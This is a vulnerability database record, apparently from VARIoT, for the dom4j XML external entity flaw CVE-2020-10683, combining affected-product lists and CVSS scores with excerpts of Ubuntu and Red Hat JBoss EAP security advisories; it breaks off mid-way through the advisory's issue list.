eap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.src.rpm eap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.src.rpm eap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.src.rpm eap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.src.rpm eap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.src.rpm eap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.src.rpm eap7-wildfly-http-client-1.0.22-1.Final_redhat_00001.1.el6eap.src.rpm
noarch: eap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.noarch.rpm eap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.noarch.rpm eap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-core-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-entitymanager-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-envers-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-java8-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-validator-cdi-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-cachestore-jdbc-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-cachestore-remote-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-client-hotrod-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-core-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-spi-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-v53-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-spi-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-core-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-core-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-deployers-common-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-jdbc-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm 
eap7-ironjacamar-validator-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-datatype-jdk8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-datatype-jsr310-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-jaxrs-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-jaxrs-json-provider-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-module-jaxb-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-cli-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-core-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap6.4-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap6.4-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.2-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.3-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly10.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly10.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm 
eap7-jboss-server-migration-wildfly11.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly12.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly13.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly14.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly15.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly16.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly17.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly18.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly8.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly9.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.noarch.rpm eap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-netty-all-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.noarch.rpm eap7-undertow-server-1.6.2-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-elytron-tool-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-client-common-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-ejb-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-naming-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-transaction-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-javadocs-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-modules-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-14900 https://access.redhat.com/security/cve/CVE-2020-1710 https://access.redhat.com/security/cve/CVE-2020-1748 https://access.redhat.com/security/cve/CVE-2020-10672 https://access.redhat.com/security/cve/CVE-2020-10673 https://access.redhat.com/security/cve/CVE-2020-10683 https://access.redhat.com/security/cve/CVE-2020-10687 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10714 https://access.redhat.com/security/cve/CVE-2020-10718 https://access.redhat.com/security/cve/CVE-2020-10740 https://access.redhat.com/security/cve/CVE-2020-14297 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/ https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXzqIS9zjgjWX9erEAQjYNxAAk4rojlcRbfjwu0wlWLTU1MbxQNclVtVh MpQnFzyvJVVXX0lslx7NGxHlRNWRgqI/XC1QDqlHpRs4du5/a2Uj+8c5u+WPQefF QCqOvSntbMli42/I7+fCehLVofx/HkuAVcBoGrIGby1E4rddDljh4bH3r43I7wa5 HN9ki8uFAy8bIAzfXW+RB4rxtnsAABv/VFoH1fWmrXCXE6A6aG+AU86ddty0JQHN JhQp6v/X/3ccCvHYTAO8vlbqIJ4fE86e1+5oRBor+4ZD4mMVzGKm4cf8CMPXsKIB 9dFGo8WHFBgEi4hBbBFtFfaE2DGZ6K4Q7X0IAhiiYJmpPg8NgzGiqVvOAG+/OrBz DE84ZPxZwS1zR82wwIyHP4W5mYIhQTxhtp+E9Klu4gpFIAmK8bVfGf2Ub0HOCS6z sbN1Eiv0SBfWRHBfBkuRTBd0aEcmGRNl4GSXzXtanTf0OhFk/4pxdJPmKDEBFWvg 3dtwFi7+/8JoAch8GKQCo4UoSo6etQu45sUH6Q8ozuxYA72+J9K7cpwp/fVhiYRT nruC+2HDuugrC8UVJ/24E++49omdSXAm+UR9tvkFdVU3IpXLJNWO8s4QbrGC7CN7 Lvg/ukygGhrEEyQ1J9yYSeeNISQWJGOSKj/bgYRAh/AbX/QcZZfus7ppAasNjndn Bk4PSTq9yaw= =ZNiG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Summary:
This is a security update for JBoss EAP Continuous Delivery 20.
The References section of this erratum contains a download link (you must log in to download the update).
The JBoss server process must be restarted for the update to take effect.
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202005-1054", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "insurance rules palette", scope: "lte", trust: 1, vendor: "oracle", version: "11.3.0", }, { model: "dom4j", scope: "lt", trust: 1, vendor: "dom4j", version: "2.0.3", }, { model: "retail price 
management", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "19.12.0.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "17.1.0.0", }, { model: "retail xstore point of service", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.6", }, { model: "enterprise data quality", scope: "eq", trust: 1, vendor: "oracle", version: "11.1.1.9.0", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "flexcube core banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.8.0", }, { model: "insurance policy administration j2ee", scope: "gte", trust: 1, vendor: "oracle", version: "11.1.0", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.0", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.3.0", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "snapmanager", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "insurance policy administration j2ee", scope: "eq", trust: 1, vendor: "oracle", version: "11.0.2", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "utilities framework", scope: "gte", trust: 1, vendor: "oracle", version: "4.3.0.1.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "17.12.17.1", }, { model: "snapcenter", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "retail order broker", scope: "eq", trust: 1, 
vendor: "oracle", version: "15.0", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "18.0", }, { model: "insurance policy administration j2ee", scope: "lte", trust: 1, vendor: "oracle", version: "11.3.0", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "19.0", }, { model: "enterprise data quality", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "endeca information discovery integrator", scope: "eq", trust: 1, vendor: "oracle", version: "3.2.0", }, { model: "oncommand workflow automation", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "16.2.20.1", }, { model: "dom4j", scope: "lt", trust: 1, vendor: "dom4j", version: "2.1.3", }, { model: "business process management suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "business process management suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "19.12.6.0", }, { model: "health sciences information manager", scope: "eq", trust: 1, vendor: "oracle", version: "3.0.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "18.8.19.0", }, { model: "insurance rules palette", scope: "eq", trust: 1, vendor: "oracle", version: "11.0.2", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "agile plm", scope: "eq", trust: 1, vendor: "oracle", version: "9.3.5", }, { model: "retail xstore point of service", scope: "eq", trust: 1, vendor: "oracle", version: "18.0.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "16.1.0.0", }, { model: "retail 
xstore point of service", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.4", }, { model: "rapid planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.1", }, { model: "communications diameter signaling router", scope: "lte", trust: 1, vendor: "oracle", version: "8.2.2", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.0.0", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "11.1.1.9.0", }, { model: "communications diameter signaling router", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0", }, { model: "oncommand api services", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.4.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "15.0", }, { model: "agile plm", scope: "eq", trust: 1, vendor: "oracle", version: "9.3.3", }, { model: "health sciences empirica signal", scope: "eq", trust: 1, vendor: "oracle", version: "9.0", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "19.1", }, { model: "banking platform", scope: "lte", trust: 1, vendor: "oracle", version: "2.10.0", }, { model: "data integrator", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "storagetek tape analytics sw tool", scope: "eq", trust: 1, vendor: "oracle", version: "2.3", }, { model: "documaker", scope: "lte", trust: 1, vendor: "oracle", version: "12.6.4", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 1, vendor: "oracle", version: "10.2.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "18.1.0.0", }, { model: "financial services analytical applications infrastructure", scope: "lte", 
trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "snap creator framework", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "rapid planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.2", }, { model: "utilities framework", scope: "lte", trust: 1, vendor: "oracle", version: "4.3.0.6.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "2.2.0.0.0", }, { model: "insurance rules palette", scope: "eq", trust: 1, vendor: "oracle", version: "10.2.0", }, { model: "retail xstore point of service", scope: "eq", trust: 1, vendor: "oracle", version: "17.0.4", }, { model: "flexcube core banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.10.0", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "17.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.2.0.3.0", }, { model: "dom4j", scope: "gte", trust: 1, vendor: "dom4j", version: "2.1.0", }, { model: "communications application session controller", scope: "eq", trust: 1, vendor: "oracle", version: "3.9m0p1", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "13.4.0.0", }, { model: "fusion middleware", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 1, vendor: "oracle", version: "10.2.4", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3.0", }, { model: "application testing suite", scope: "eq", trust: 1, vendor: "oracle", version: "13.3.0.1", }, { model: "ubuntu linux", scope: "eq", 
trust: 1, vendor: "canonical", version: "16.04", }, { model: "flexcube core banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.7.0", }, { model: "insurance rules palette", scope: "gte", trust: 1, vendor: "oracle", version: "11.1.0", }, { model: "flexcube core banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.9.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 1, vendor: "oracle", version: "10.2.0", }, { model: "documaker", scope: "gte", trust: 1, vendor: "oracle", version: "12.6.0", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "18.0", }, { model: "banking platform", scope: "gte", trust: 1, vendor: "oracle", version: "2.4.0", }, { model: "leap", scope: "eq", trust: 1, vendor: "opensuse", version: "15.1", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "19.0", }, { model: "data integrator", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, ], sources: [ { db: "NVD", id: "CVE-2020-10683", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Red Hat", sources: [ { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, ], trust: 1.3, }, cve: "CVE-2020-10683", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": 
"https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2020-10683", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-163186", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", exploitabilityScore: 3.9, id: "CVE-2020-10683", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2020-10683", trust: 1, value: "CRITICAL", }, { author: "CNNVD", id: "CNNVD-202004-1133", trust: 0.6, value: "CRITICAL", }, { author: "VULHUB", id: "VHN-163186", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, description: { "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. dom4j is an open source framework for processing XML. A code issue vulnerability exists in dom4j versions prior to 2.0.3 and 2.1.x versions prior to 2.1.3. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products. ==========================================================================\nUbuntu Security Notice USN-4575-1\nOctober 13, 2020\n\ndom4j vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n\nSummary:\n\ndom4j could be made to expose sensitive information or run programs if it\nreceived specially crafted input. \n\nSoftware Description:\n- dom4j: Flexible XML framework for Java\n\nDetails:\n\nIt was discovered that dom4j incorrectly handled reading XML data. A\nremote attacker could exploit this with a crafted XML file to expose\nsensitive data or possibly execute arbitrary code. (CVE-2020-10683)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libdom4j-java 1.6.1+dfsg.3-2ubuntu1.1\n\nIn general, a standard system update will make all the necessary changes. 
Description:\n\nRed Hat Process Automation Manager is an open source business process\nmanagement suite that combines process management and decision service\nmanagement and enables business and IT users to create, manage, validate,\nand deploy process applications and decision services. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update\nAdvisory ID: RHSA-2020:3461-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3461\nIssue date: 2020-08-17\nCVE Names: CVE-2019-14900 CVE-2020-1710 CVE-2020-1748 \n CVE-2020-10672 CVE-2020-10673 CVE-2020-10683 \n CVE-2020-10687 CVE-2020-10693 CVE-2020-10714 \n CVE-2020-10718 CVE-2020-10740 CVE-2020-14297 \n=====================================================================\n\n1. Summary:\n\nAn update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.3 for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss EAP 7.3 for RHEL 6 Server - noarch\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.3.2 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.3.1,\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.3.2 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. 
\n\nSecurity Fix(es):\n\n* wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API\n(CVE-2020-10718)\n\n* dom4j: XML External Entity vulnerability in default SAX parser\n(CVE-2020-10683)\n\n* wildfly-elytron: session fixation when using FORM authentication\n(CVE-2020-10714)\n\n* wildfly-undertow: Undertow: Incomplete fix for CVE-2017-2666 due to\npermitting invalid characters in HTTP requests (CVE-2020-10687)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command execution\n(CVE-2020-10673)\n\n* hibernate-core: hibernate: SQL injection issue in Hibernate ORM\n(CVE-2019-14900)\n\n* wildfly: unsafe deserialization in Wildfly Enterprise Java Beans\n(CVE-2020-10740)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command execution\n(CVE-2020-10672)\n\n* undertow: EAP: field-name is not parsed in accordance to RFC7230\n(CVE-2020-1710)\n\n* hibernate-validator: Improper input validation in the interpolation of\nconstraint error messages (CVE-2020-10693)\n\n* wildfly: Improper authorization issue in WildFlySecurityManager when\nusing alternative protection domain (CVE-2020-1748)\n\n* wildfly: Some EJB transaction objects may get accumulated causing Denial\nof Service (CVE-2020-14297)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, see the CVE page(s) listed in the\nReferences section. \n\n4. Solution:\n\nBefore applying this update, ensure all previously released errata relevant\nto your system have been applied. \n\nFor details about how to apply this update, see:\n\nhttps://access.redhat.com/articles/11258\n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1666499 - CVE-2019-14900 hibernate: SQL injection issue in Hibernate ORM\n1694235 - CVE-2020-10683 dom4j: XML External Entity vulnerability in default SAX parser\n1785049 - CVE-2020-10687 Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1828476 - CVE-2020-10718 wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API\n1834512 - CVE-2020-10740 wildfly: unsafe deserialization in Wildfly Enterprise Java Beans\n1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18793 - [GSS](7.3.z) Upgrade Hibernate ORM from 5.3.16 to 5.3.17\nJBEAP-19095 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.20 to 1.0.21\nJBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final\nJBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 